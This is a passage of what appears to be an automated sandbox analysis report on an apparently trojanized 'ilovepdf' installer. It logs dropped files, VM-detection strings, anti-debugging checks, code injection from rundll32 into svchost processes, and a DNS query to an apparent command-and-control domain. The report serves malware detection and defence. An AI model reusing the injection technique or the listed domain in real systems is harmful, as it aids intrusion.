Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ti.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-ATKLL.tmp\_isetup\_setup64.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-93C0J.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\ilovepdf.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\twlib.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-UKPSI.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-JDQA9.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\tt.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\th.dll (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-VR0CA.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\unins000.exe (copy)Jump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-CU1EC.tmpJump to dropped file
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpDropped PE file which has not been started: C:\Program Files (x86)\ilovepdf\is-8KFAQ.tmpJump to dropped file
Source: C:\Windows\System32\svchost.exeFile opened: PhysicalDrive0
Source: C:\Windows\System32\svchost.exeThread delayed: delay time: 3600000
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC4560 lstrlenW,GetProcessImageFileNameW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,GetLogicalDriveStringsW,QueryDosDeviceW,QueryDosDeviceW,GetLastError,QueryDosDeviceW,lstrlenW,wsprintfW,
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: "@SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000.ifo
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#disk&ven_vmware&prod_virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}#{6ead3d82-25ec-46bc-b7fd-c1f0df8f5037}
Source: svchost.exe, 00000026.00000002.827434902.0000025C96535000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWe>%SystemRoot%\system32\mswsock.dll<IdleSettings>
Source: svchost.exe, 00000010.00000003.500955879.0000012E19682000.00000004.00000001.sdmpBinary or memory string: VMware, Inc.
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}a0c91efb8b}
Source: svchost.exe, 00000010.00000002.816396441.0000012E176C2000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAWMSAFD Irda [IrDA]OleMainThreadWndClass
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmp, svchost.exe, 00000011.00000000.333907246.00000204F304E000.00000004.00000001.sdmp, svchost.exe, 00000014.00000000.341000431.000001D91A429000.00000004.00000001.sdmp, svchost.exe, 00000018.00000000.359760415.000001DC51288000.00000004.00000001.sdmp, svchost.exe, 00000025.00000003.533385222.000001AFB9A82000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmpBinary or memory string: VMware, Inc.ed
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmpBinary or memory string: SCSI\DISK&VEN_VMWARE&PROD_VIRTUAL_DISK\5&1EC51BF7&0&000000
Source: svchost.exe, 00000015.00000002.812290749.000002F2C5013000.00000004.00000001.sdmpBinary or memory string: Allow inbound TCP port 636 traffic for vmicheartbeat
Source: svchost.exe, 0000001E.00000002.816717606.000001BE5C115000.00000004.00000001.sdmpBinary or memory string: nonic\\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}DeviceArrivalPU
Source: svchost.exe, 0000001E.00000002.807078645.000000220DAFA000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&0000001e9-90ce-806e6f6e6963}\
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}d
Source: svchost.exe, 0000001E.00000000.383086421.000001BE5C029000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}1e
Source: svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{53f56307-b6bf-11d0-94f2-00a0c91efb8b}
Source: rundll32.exe, 0000000D.00000002.415655644.000000000339A000.00000004.00000020.sdmp, svchost.exe, 0000000E.00000002.812356243.0000024B7CA36000.00000004.00000001.sdmp, svchost.exe, 00000013.00000000.337659687.000002334203F000.00000004.00000001.sdmp, svchost.exe, 00000015.00000000.344287290.000002F2C5029000.00000004.00000001.sdmp, svchost.exe, 00000016.00000000.348368674.00000222CA43F000.00000004.00000001.sdmp, svchost.exe, 00000017.00000002.813571849.0000028621678000.00000004.00000001.sdmp, svchost.exe, 00000019.00000000.364042683.000002216AA5A000.00000004.00000001.sdmp, svchost.exe, 0000001B.00000002.816000256.000002743903C000.00000004.00000001.sdmp, svchost.exe, 0000001C.00000000.376788702.000001111A236000.00000004.00000001.sdmp, svchost.exe, 0000001D.00000000.380313179.0000022F11A29000.00000004.00000001.sdmp, svchost.exe, 0000001E.00000000.384529997.000001BE5C03F000.00000004.00000001.sdmp, svchost.exe, 0000001F.00000002.810844808.0000021C22429000.00000004.00000001.sdmp, svchost.exe, 00000022.00000003.572028015.00000202B1ABD000.00000004.00000001.sdmp, svchost.exe, 00000025.00000000.401740945.000001AFB9AA4000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: svchost.exe, 00000026.00000000.409171798.0000025C96594000.00000004.00000001.sdmpBinary or memory string: VMware7,1L
Source: svchost.exe, 0000001B.00000000.366941643.0000027439029000.00000004.00000001.sdmpBinary or memory string: zSCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000_0r
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmpBinary or memory string: l\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}22\\?\Volume{e6e9dfd8-98f2-11e9-90ce-806e6f6e6963}\
Source: svchost.exe, 00000010.00000003.682254804.0000012E19614000.00000004.00000001.sdmpBinary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0 E4F221468}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmpBinary or memory string: VMware820ES
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: (@\??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000011.00000000.331175005.00000204F3067000.00000004.00000001.sdmpBinary or memory string: @Hyper-V RAW
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: "@\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmpBinary or memory string: (5>OVMware, Inc.VMware Virtual disk 2.0
Source: svchost.exe, 0000001E.00000000.383055676.000001BE5C013000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: svchost.exe, 0000001E.00000000.383103726.000001BE5C03F000.00000004.00000001.sdmpBinary or memory string: \\?\SCSI#Disk&Ven_VMware&Prod_Virtual_disk#5&1ec51bf7&0&000000#{7fccc86c-228a-40ad-8a58-f590af7bfdce}b}}
Source: svchost.exe, 00000026.00000000.407855374.0000025C95C8A000.00000004.00000001.sdmpBinary or memory string: VMware8
Source: svchost.exe, 0000001E.00000002.815535312.000001BE5C07A000.00000004.00000001.sdmpBinary or memory string: AASCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000&00A8
Source: svchost.exe, 00000010.00000003.422971039.0000012E176AF000.00000004.00000001.sdmpBinary or memory string: VMware
Source: svchost.exe, 00000011.00000000.329876741.00000204EFA29000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW}
Source: svchost.exe, 00000010.00000002.812470084.0000012E17623000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW@
Source: C:\Windows\System32\msiexec.exeProcess information queried: ProcessInformation
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_004AF91C GetSystemInfo,VirtualQuery,VirtualProtect,VirtualProtect,VirtualQuery,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040AEF4 FindFirstFileW,FindClose,
Source: C:\Windows\Installer\MSIFBC3.tmpCode function: 10_2_0040A928 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E6A0 FindFirstFileW,FindClose,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0060BC10 FindFirstFileW,GetLastError,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_0040E0D4 GetModuleHandleW,GetProcAddress,FindFirstFileW,FindClose,lstrlenW,lstrlenW,
Source: C:\Users\user\AppData\Local\Temp\is-OOL1B.tmp\MSIFBC3.tmpCode function: 11_2_006B76A0 FindFirstFileW,SetFileAttributesW,FindNextFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4C20 wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB56D0 FindFirstFileW,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB4E30 wsprintfW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB57F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EE97D9 FindFirstFileExA,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB42B0 LocalAlloc,wsprintfW,FindFirstFileW,_wcsstr,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB6A30 lstrcatW,wsprintfW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EB53D0 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,std::_Xinvalid_argument,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC7390 lstrcpyW,lstrcatW,lstrcatW,CreateDirectoryW,GetLastError,GetLastError,FindFirstFileW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D5E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0EAE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D57B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D49FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D7A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D63F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D110478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0D4B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178749FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17877A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178757B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17875E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1788AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178B0478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178763F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E17874B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805CF4 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19823D90 FindFirstFileW,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,_invalid_parameter_noinfo_noreturn,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB2F0 FindFirstFileW,FreeEnvironmentStringsW,GetCommandLineA,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384B90 LocalAlloc,wsprintfW,FindFirstFileW,LocalReAlloc,wsprintfW,lstrlenW,wsprintfW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33863F0 FindFirstFileW,FindClose,CreateFileW,CloseHandle,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33C0478 FindFirstFileExA,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3384AE3 FindFirstFileW,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33849FF wsprintfW,FindFirstFileW,LocalAlloc,LocalReAlloc,lstrlenW,FindNextFileW,LocalFree,FindClose,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3387A20 GetEnvironmentVariableW,LoadLibraryA,GetProcAddress,GetUserProfileDirectoryW,CloseHandle,lstrcatW,wsprintfW,wsprintfW,FindFirstFileW,lstrcmpW,lstrcmpW,wsprintfW,PathFileExistsW,FindNextFileW,wsprintfW,FindClose,wsprintfW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33857B0 wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F3385E30 lstrlenW,wsprintfW,FindFirstFileW,wsprintfW,wsprintfW,FindNextFileW,FindClose,lstrlenW,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F339AE60 lstrcpyW,lstrcatW,CreateDirectoryW,GetLastError,FindFirstFileW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,lstrcmpW,lstrcmpW,CreateDirectoryW,GetLastError,CopyFileW,FindNextFileW,
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\System32\msiexec.exeFile Volume queried: C:\ FullSizeInformation
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC5C60 GetModuleFileNameW,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,Process32NextW,FindCloseChangeNotification,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC8FD0 CloseServiceHandle,LoadLibraryA,LoadLibraryA,GetProcAddress,RtlAdjustPrivilege,OpenProcess,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,FindCloseChangeNotification,VirtualAllocEx,WriteProcessMemory,CreateRemoteThread,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,WaitForSingleObject,CloseHandle,VirtualFreeEx,CloseHandle,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDEFAF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04D772D8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED669F IsDebuggerPresent,OutputDebugStringW,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FB804 GetLastError,IsDebuggerPresent,OutputDebugStringW,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EBB540 UnmapViewOfFile,CreateFileMappingW,MapViewOfFile,GetProcessHeap,HeapFree,
Source: C:\Windows\System32\svchost.exeProcess token adjusted: Debug
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC1D00 SetEvent,InterlockedExchange,BlockInput,BlockInput,BlockInput,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EDE94C IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED5AE6 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04ED62AE IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D103EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FA9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 14_2_0000024B7D0FB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789B324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1789A9E0 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E178A3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E1980296C IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E19805788 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198EB3D8 SetUnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D3648 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 16_2_0000012E198D0824 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33AB324 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
Source: C:\Windows\System32\svchost.exeCode function: 17_2_00000204F33B3EBC RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

HIPS / PFW / Operating System Protection Evasion:

barindex
System process connects to network (likely due to code injection or exploit)Show sources
Source: C:\Windows\System32\svchost.exeDomain query: toa.mygametoa.com
Allocates memory in foreign processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 24B7C9A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 204F32C0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 23341FB0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1D91A370000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2F2C5B40000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 222CAA60000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 286215B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1DC519A0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2216B180000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 2743A260000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1111A940000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 22F12130000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1BE5BFA0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 21C22B30000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 202B2180000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 1AFBA0B0000 protect: page execute and read and write
Source: C:\Windows\SysWOW64\rundll32.exeMemory allocated: C:\Windows\System32\svchost.exe base: 25C96320000 protect: page execute and read and write
Contains functionality to inject code into remote processesShow sources
Source: C:\Windows\SysWOW64\rundll32.exeCode function: 13_2_04EC98E0 GetVersionExW,GetProcAddress,OpenProcess,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetSystemDirectoryW,wsprintfW,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,Sleep,GetCurrentProcess,OpenProcessToken,DuplicateTokenEx,SetTokenInformation,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CreateProcessAsUserW,CloseHandle,CreateProcessW,LoadLibraryA,GetProcAddress,CloseHandle,GetThreadContext,VirtualAllocEx,TerminateProcess,WriteProcessMemory,SetThreadContext,ResumeThread,CloseHandle,WaitForSingleObject,CloseHandle,WaitForSingleObject,OpenThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,WaitForSingleObject,CloseHandle,
Creates a thread in another existing process (thread injection)Show sources
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 7C9A0000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: F32C0000
Source: C:\Windows\SysWOW64\rundll32.exeThread created: C:\Windows\System32\svchost.exe EIP: 41FB0000
